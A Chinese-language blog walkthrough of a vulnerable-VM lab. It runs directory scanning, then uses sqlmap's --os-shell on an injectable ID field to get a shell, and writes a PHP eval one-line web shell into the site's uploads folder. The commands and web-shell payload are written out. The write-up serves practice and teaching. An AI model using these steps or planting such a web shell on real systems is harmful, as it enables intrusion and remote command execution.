下载安装靶机后要进行靶机ip的确定,具体步骤可以查看我的上一篇博客,这里就不细说了。
在物理机访问靶机IP地址进入这样一个页面,我们发现这里没有输入框也没有点击按钮,导致我们无处下手,不过我们还可以用工具去扫描他的目录,去看看他还有没有其他级别的目录
这里可以看到有一个robots.txt的文件,我们都知道这里放着的是爬虫禁止目录,直接去访问发现如下几个目录
我们访问之后后发现两个目录都禁止访问,那么我们可以访问以下第二个目录的一级目录,然后就进入了一个提交id去获取信息的页面
见到输入框,我们先开启抓包,输入一个1点击提交后将获取到的请求包放到sqlmap中去检测是否存在sql注入漏洞(这里记得在参数后面加一个*)
将数据包放到sqlmap根目录下一个的一个txt文件中,我这里是html.txt文件,然后到sqlmap中去进行注入,因为这里只有一个提交框,没法登陆,我们获取他数据库中的文件是没用处的,所以在这里,我们要进行--os-shell,去获取他的shell权限,但是这就需要他的绝对路经了。在robot.txt中我们得知了两个目录,在利用了第二个目录后,我们还可以利用工具查询一下第一个目录下是否还存在别的东西,这里我们又扫描出来他有一个info.php的文件,我们直接去访问得到一个探针文件的页面
在这里就有网站根目录的路径,我们还需要找一个有生成文件权限的目录,而之前查到的uploads作为一个上传文件保存目录,它肯定有这个权限
在sqlmap中输入如下语句,红框中的就是绝对路径
python3 sqlmap.py -r html.txt --os-shell
然后就获得了shell权限,输入下面语句就可以在uploads目录中生成一个文件名为233.php的一句话木马
echo '<?php @eval($_POST['cmd']) ?>' >>/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/233.php
访问该文件后发现成功访问
用蚁剑去连也可以成功连接